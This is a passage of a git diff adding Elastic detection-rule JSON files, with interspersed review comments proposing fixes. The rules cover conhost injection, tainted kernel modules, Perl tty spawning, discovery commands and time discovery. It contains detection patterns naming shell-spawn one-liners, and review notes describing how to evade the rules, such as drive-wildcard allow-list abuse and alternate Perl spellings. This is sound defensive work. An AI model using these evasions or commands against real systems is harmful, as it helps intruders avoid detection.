"type": "eql", + "version": 109 + }, + "id": "05b358de-aa6d-4f6c-89e6-78f74018b43b_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_110.json b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_110.json new file mode 100644 index 00000000000..12833ad8d9c --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_110.json 
@@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Conhost Spawned By Suspicious Parent Process", + "note": "## Triage and analysis\n\n### Investigating Conhost Spawned By Suspicious Parent Process\n\nThe Windows Console Host, or `conhost.exe`, is both the server application for all of the Windows Console APIs as well as the classic Windows user interface for working with command-line applications.\n\nAttackers often rely on custom shell implementations to avoid using built-in command interpreters like `cmd.exe` and `PowerShell.exe` and bypass application allowlisting and security features. Attackers commonly inject these implementations into legitimate system processes.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the parent process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Process from Conhost - 28896382-7d4f-4d50-9b72-67091901fd26\n- Suspicious PowerShell Engine ImageLoad - 852c1f19-68e8-43a6-9dce-340771fe1be3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"conhost.exe\" and\n process.parent.name : (\"lsass.exe\", \"services.exe\", \"smss.exe\", \"winlogon.exe\", \"explorer.exe\", \"dllhost.exe\", \"rundll32.exe\",\n \"regsvr32.exe\", \"userinit.exe\", \"wininit.exe\", \"spoolsv.exe\", \"ctfmon.exe\") and\n not (process.parent.name : \"rundll32.exe\" and\n process.parent.args : (\"?:\\\\Windows\\\\Installer\\\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc\",\n \"?:\\\\WINDOWS\\\\system32\\\\PcaSvc.dll,PcaPatchSdbTask\",\n \"?:\\\\WINDOWS\\\\system32\\\\davclnt.dll,DavSetCookie\"))\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2017/08/monitoring-windows-console-activity-part-one.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "05b358de-aa6d-4f6c-89e6-78f74018b43b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule 
to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "05b358de-aa6d-4f6c-89e6-78f74018b43b_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_3.json b/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_3.json new file mode 100644 index 00000000000..471abafa76b --- /dev/null 
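Review bot: The rundll32 exclusion is keyed only on `process.parent.args`, and each allow-listed path starts with the `?:` drive wildcard, so `?:\\WINDOWS\\system32\\davclnt.dll,DavSetCookie` is also satisfied by a DLL placed at `D:\WINDOWS\system32\davclnt.dll` on any volume the attacker can write to; the allow-list then suppresses exactly the conhost spawn this rule exists to catch. Either pin these three patterns to the system drive, or keep `?:` and record the residual risk in the note's "False positive analysis" section so analysts know the exclusion is argument-based only. A triage step such as "confirm the DLL named in the parent's arguments resolves to the copy in the real `%SystemRoot%\System32`" would close the gap operationally. The `_109` copy of this rule in the same commit carries the identical exclusion.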
+++ b/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_3.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors the syslog log file for messages related to instances of a tainted kernel module load. Rootkits often leverage kernel modules as their main defense evasion technique. Detecting tainted kernel module loads is crucial for ensuring system security and integrity, as malicious or unauthorized modules can compromise the kernel and lead to system vulnerabilities or unauthorized access.", + "from": "now-9m", + "index": [ + "logs-system.syslog-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Tainted Kernel Module Load", + "query": "host.os.type:linux and event.dataset:\"system.syslog\" and process.name:kernel and \nmessage:\"module verification failed: signature and/or required key missing - tainting kernel\"\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "05cad2fb-200c-407f-b472-02ea8c9e5e4a", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Filebeat\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat for the Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete Setup and Run Filebeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the Filebeat System Module to be enabled.\n- The system module collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + 
"tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 3 + }, + "id": "05cad2fb-200c-407f-b472-02ea8c9e5e4a_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_4.json b/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_4.json new file mode 100644 index 00000000000..ca576edf2af --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/05cad2fb-200c-407f-b472-02ea8c9e5e4a_4.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors the syslog log file for messages related to instances of a tainted kernel module load. Rootkits often leverage kernel modules as their main defense evasion technique. Detecting tainted kernel module loads is crucial for ensuring system security and integrity, as malicious or unauthorized modules can compromise the kernel and lead to system vulnerabilities or unauthorized access.", + "from": "now-9m", + "index": [ + "logs-system.syslog-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Tainted Kernel Module Load", + "query": "host.os.type:linux and event.dataset:\"system.syslog\" and process.name:kernel and \nmessage:\"module verification failed: signature and/or required key missing - tainting kernel\"\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "05cad2fb-200c-407f-b472-02ea8c9e5e4a", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Filebeat\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat for the Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete Setup and Run Filebeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the Filebeat System Module to be enabled.\n- The system module collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + 
"tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 4 + }, + "id": "05cad2fb-200c-407f-b472-02ea8c9e5e4a_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_108.json b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_108.json new file mode 100644 index 00000000000..f56998c5330 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/05e5a668-7b51-4a67-93ab-e9af405c9ef3_108.json 
@@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a terminal (tty) is spawned via Perl. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Interactive Terminal Spawned via Perl", + "query": "event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:perl and\n process.args:(\"exec \\\"/bin/sh\\\";\" or \"exec \\\"/bin/dash\\\";\" or \"exec \\\"/bin/bash\\\";\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "05e5a668-7b51-4a67-93ab-e9af405c9ef3", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 108 + }, + "id": "05e5a668-7b51-4a67-93ab-e9af405c9ef3_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_111.json b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_111.json new file mode 100644 index 00000000000..b090b7e7f61 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0635c542-1b96-4335-9b47-126582d2c19a_111.json 
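Review bot: The `process.args` terms match three exact strings — `exec "/bin/sh";`, `exec "/bin/dash";`, `exec "/bin/bash";` — so any deviation in the one-liner evades the rule: single quotes (`exec '/bin/sh';`), parentheses (`exec("/bin/sh")`), a flag (`exec "/bin/sh -i";`), another shell or path (`/bin/zsh`, `/usr/bin/bash`), or `system` in place of `exec`. Since `process.args` is a keyword field, wildcard patterns such as `process.args:(*exec*/bin/*sh* or *system*/bin/*sh*)` would cover those spellings at modest false-positive cost, as a Perl process handing off to a shell is uncommon in production. If the exact literals are kept deliberately for precision, that trade-off belongs in the `description` so nobody reads the rule as general tty-upgrade coverage.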
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Discovery of remote system information using built-in commands, which may be used to move laterally.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote System Discovery Commands", + "note": "## Triage and analysis\n\n### Investigating Remote System Discovery Commands\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `arp` or `nbstat` utilities to enumerate remote systems in the environment, which is useful for attackers to identify lateral movement targets.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n ((process.name : \"nbtstat.exe\" and process.args : (\"-n\", \"-s\")) or\n (process.name : \"arp.exe\" and process.args : \"-a\") or\n (process.name : \"nltest.exe\" and process.args : (\"/dclist\", \"/dsgetdc\")) or\n (process.name : \"nslookup.exe\" and process.args : \"*_ldap._tcp.dc.*\") or\n (process.name: (\"dsquery.exe\", \"dsget.exe\") and process.args: \"subnet\") or\n ((((process.name : \"net.exe\" or process.pe.original_file_name == \"net.exe\") or\n ((process.name : \"net1.exe\" or process.pe.original_file_name == \"net1.exe\") and not \n process.parent.name : \"net.exe\")) and \n process.args : \"group\" and process.args : \"/domain\" and not process.args : \"/add\")))\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, 
+ { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0635c542-1b96-4335-9b47-126582d2c19a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1016", + "name": "System Network Configuration Discovery", + "reference": "https://attack.mitre.org/techniques/T1016/" + }, + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": "https://attack.mitre.org/techniques/T1018/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "0635c542-1b96-4335-9b47-126582d2c19a_111", + "type": "security-rule" +} \ No newline at end of file 
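Review bot: The investigation guide in `note` says the rule "looks for the execution of the `arp` or `nbstat` utilities", but the `query` in this hunk also matches nltest, nslookup, dsquery/dsget and `net group /domain`, and the binary it actually matches is spelled `nbtstat.exe`. An analyst triaging an alert raised by the nltest or net.exe branch will find no guidance that corresponds to it. Suggest rewording that sentence to `This rule looks for the execution of nbtstat, arp, nltest, nslookup, dsquery/dsget or net group /domain to enumerate remote systems in the environment, which is useful for attackers to identify lateral movement targets.` so the guide covers every branch of the query.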
diff --git a/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_6.json b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_6.json new file mode 100644 index 00000000000..b0ae220ede7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_6.json 
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Detects the usage of commonly used system time discovery techniques, which attackers may use during the reconnaissance phase after compromising a system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "System Time Discovery", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (\n (process.name: \"net.exe\" or (process.name : \"net1.exe\" and not process.parent.name : \"net.exe\")) and \n process.args : \"time\" and not process.args : \"/set\"\n ) or \n (process.name: \"w32tm.exe\" and process.args: \"/tz\") or \n (process.name: \"tzutil.exe\" and process.args: \"/g\")\n) and not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "06568a02-af29-4f20-929c-f3af281e41aa", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + 
"technique": [ + { + "id": "T1124", + "name": "System Time Discovery", + "reference": "https://attack.mitre.org/techniques/T1124/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "06568a02-af29-4f20-929c-f3af281e41aa_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0678bc9c-b71a-433b-87e6-2f664b6b3131_3.json b/packages/security_detection_engine/kibana/security_rule/0678bc9c-b71a-433b-87e6-2f664b6b3131_3.json new file mode 100644 index 00000000000..5ccd3ec554e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0678bc9c-b71a-433b-87e6-2f664b6b3131_3.json 
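Review bot: The `net.exe` and `net1.exe` clauses of the `query` match on `process.name` only, whereas the sibling rule 0635c542 earlier in this diff also accepts `process.pe.original_file_name == "net.exe"`, so a renamed copy of the binary is covered there but not here. Suggest aligning the first clause with that rule, e.g. `(process.name : "net.exe" or ?process.pe.original_file_name == "net.exe")` and the equivalent for `net1.exe`, using the optional-field `?` prefix since the `logs-windows.*` index may not carry the PE field. If that change is made, `process.pe.original_file_name` should also be listed under `required_fields`, as 0635c542 does.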
@@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected an unusually high file size shared by a remote host indicating potential lateral movement activity. One of the primary goals of attackers after gaining access to a network is to locate and exfiltrate valuable information. Instead of multiple small transfers that can raise alarms, attackers might choose to bundle data into a single large file transfer.", + "from": "now-90m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_high_file_size_remote_file_transfer", + "name": "Unusual Remote File Size", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": 